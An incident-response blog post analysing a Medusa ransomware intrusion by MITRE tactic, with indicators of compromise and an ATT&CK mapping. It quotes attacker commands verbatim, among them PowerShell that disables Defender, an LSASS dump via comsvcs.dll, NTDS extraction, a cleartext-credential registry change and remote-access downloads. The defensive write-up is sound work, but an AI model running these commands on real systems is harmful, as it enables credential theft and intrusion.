Skip to navigation Skip to main content Skip to footer

Don’t throw a hissy fit; defend against Medusa

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families 

Author: Molly Dewis 

Intro 

Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.   

In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into the Medusa. 

Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims. 

Summary 

This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.  

Below provides a summary of findings which are presented in this blog post: 

  • Use of web shells to maintain access. 
  • Utilising PowerShell to conduct malicious activity. 
  • Dumping password hashes.  
  • Disabling antivirus services.  
  • Use of Windows utilises for discovery activities.  
  • Reverse tunnel for C2. 
  • Data exfiltration.  
  • Deployment of Medusa ransomware. 

Medusa  

Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of a double-extortion ransomware where the threat actor exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware could be characterised as financially motivated. Victims of Medusa ransomware are from no particular industry suggesting the group behind this variant have no issue with harming any organisation.  

Incident Overview 

Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.  

Timeline 

T – Initial Access gained via web shells.  

T+13 days – Execution activity. 

T+16 days – Persistence activity. 

T+164 days – Defense Evasion activity. 

T+172 days – Persistence and Discovery activity. 

T+237 days – Defense Evasion and Credential Access Activity started. 

T+271 days – Ransomware Executed.  

Mitre TTPs 

Initial Access 

The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.  

Execution 

PowerShell was leveraged by the threat actor to conduct various malicious activity such as:   

  • Downloading executables  
    • Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc … 
  • Disabling Microsoft Defender 
    • Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; 
  • Deleting executables 
    • Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe 
  • Conducting discovery activity  
    • Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain 

Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node: / user: /password: process call create ‘cmd.exe’. 

Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for, however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.  

  • powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi 
  • msiExec.exe /i anydesk.msi /qn 

A cmd.exe process was started with the following argument list: c:\\programdata\\a.bat’;start-sleep 15;ps AnyDeskMSI 

Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.   

Persistence 

Maintaining access to the victim’s network was achieved by creating a new user admin on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\\\

Defence Evasion 

Evading detection was one of the aims for this threat actor due to the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.  

Additionally, LAdHW.sys, a signed kernel mode driver was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command amp; {Remove-NetFirewallRule -DisplayName \”\” 

The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted many of these executables such as JAVA64.exe and re.exe were deleted after use. Additionally, Sophos.exe (see below) which was packed with Themida, was executed.  

Figure 1 – Sophos.exe.
Figure 1 – Sophos.exe. 

The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities. 

Credential Access 

The following credential dumping techniques were utilised by the threat actor:  

  • Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.  
  • Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable. 
  • An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll. 
    • powershell -exec bypass -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full 
  • he built-in Windows tool ntdsutil.exe was used to extract the NTDS:  
    • powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q 

Discovery 

The threat actor conducted the following discovery activity: 

Type of discovery activity Description 
nltest /trusted_domains Enumerates domain trusts 
net group ‘domain admins’ /domain Enumerates domain groups 
net group ‘domain computers’ / domain Enumerates domain controllers 
ipconfig /all Learn about network configuration and settings 
tasklist Displays a list of currently running processes on a computer 
quser Show currently logged on users 
whoami Establish which user they were running as 
wmic os get name Gathers the name of the operating system 
wmic os get osarchitecture Establishes the operating system architecture 

Lateral Movement 

Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network. 

Command and Control 

A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used. 

Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.  

Exfiltration 

Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.  

Impact 

The Medusa ransomware in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.  

Indicators of Compromise 

IOC Value Indicator Type Description  
webhook[.]site Domain Malicious webhook 
bashupload[.]com Domain Download JAVA64.exe and RW.exe 
tmpfiles[.]org Domain Download re.exe 
134.195.88[.]27:80 IP:PORT C2 
8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6 SHA256 trust.exe (Mimikatz.exe) 
3e7529764b9ac38177f4ad1257b9cd56bc3d2708d6f04d74ea5052f6c12167f2 SHA256 JAVA_V01.exe  
f6ddd6350741c49acee0f7b87bff7d3da231832cb79ae7a1c7aa7f1bc473ac30 SHA256 testy.exe / gmer_th.exe  
63187dac3ad7f565aaeb172172ed383dd08e14a814357d696133c7824dcc4594 SHA256 JAVA_V02.exe  
781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6  SHA256 Sophos.exe 
C:\Users\Sophos.exe File Path Sophos.exe 
C:\Users\admin\Desktop\ File Path trust.exe JAVA_V01.exe testy.exe gmer_th.exe JAVA_V02.exe 
C:\ProgramData\JWrapper-Remote Access\ File Path JWrapper files 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\\\ File Path GhostWebshell compiled files 
C:\Windows\PSEXESVC.exe File Path PsExec 
C:\Users\\AppData\Local\Temp\LAdHW.sys File Path Disables AV 
C:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe File Path PDQDeployRunner – used to deploy LAdHW.sys 
C:\Users\\AppData\Local\Temp\2\gaze.exe C:\Windows\System32\gaze.exe File Path Ransomware executable 

MITRE ATT CK® 

Tactic Technique ID Description  
Initial Access Exploit Public-Facing Application T1190 A vulnerable application hosted by an external facing web server was exploited .  
Execution  Windows Management Instrumentation T1047 WMI used to remotely execute a cmd.exe process.  
Execution  Scheduled Task/Job: Scheduled Task T1053.005 Execute a.bat 
Execution  Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was leveraged to execute malicious commands.  
Execution  Software Deployment Tools T1072 PDQ Deploy was installed to deploy LAdHW.sys. 
Execution System Services: Service Execution T1569.002 PsExec was installed as a service.  
Persistence Create Account: Domain Account T1136.0012 A new user ‘admin’ was created to maintain access.  
Persistence Server Software Component: Web Shell T1505.003 Web shells were utilised to maintain access.  
Defense Evasion Obfuscated Files or Information: Software Packing T1027.002 Sophos.exe was packed with Themida. 
Defense Evasion  Indicator Removal: File Deletion T1070.004 Malicious executables were deleted after use.   
Defense Evasion Indicator Removal: Clear Persistence T1070.009 Malicious executables were deleted after use.   
Defense Evasion Obfuscated Files or Information T1027 Base64 encoded PowerShell commands were utilised to download malicious executables.  
Defense Evasion  Modify Registry T1112 The WDigest registry key was modified to enable credential dumping activity. 
Defense Evasion Impair Defenses: Disable or Modify Tools T1562.001 Antivirus services were disabled.  
Defense Evasion Impair Defenses: Disable or Modify System Firewall T1562.004 Firewall rules were deleted.  
Credential Access OS Credential Dumping: LSASS Memory T1003.001 Mimikatz was utilised.  An LSASS memory dump was created.  
Credential Access OS Credential Dumping: NTDS T1003.003 Ntdsutil.exe was used to extract the NTDS. 
Discovery Domain Trust Discovery T1482 Nltest was used to enumerate domain trusts.  
Discovery Permission Groups Discovery: Domain Groups T1069.002 Net was used to enumerate domain groups. 
Discovery System Network Configuration Discovery T1016 Ipconfig was used to learn about network configurations.  
Discovery System Service Discovery T1007 Tasklist was used to display running processes.  
Discovery Remote System Discovery T1018 Net was used to enumerate domain controllers.  
Discovery System Owner/User Discovery T1033 Quser was used to show logged in users. Whoami was used to establish which user the threat actor was running as.  
Discovery System Information Discovery T1082 Wmic was used to gather the name of the operating system and its architecture.  
Lateral Movement  Remote Services: Remote Desktop Protocol T1021.001 RDP was used to laterally move through the environment.  
Command and Control Ingress Tool Transfer T1105 PowerShell commands were used to download and execute malicious files.  
Command and Control Remote Access Software T1219 JWrapper and AnyDesk were leveraged. 
Command and Control Protocol Tunnelling T1572 A reverse tunnel was established.   
Exfiltration  Exfiltration TA0010 Data was exfiltrated and published to the leak site.  
Impact  Data Encrypted for Impact T1486 Medusa ransomware was deployed. 
Impact Inhibit System Recovery T1490 VMs from the Hyper-V storage and local and cloud backups were deleted.  

References 

[1] https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/  

[2] https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/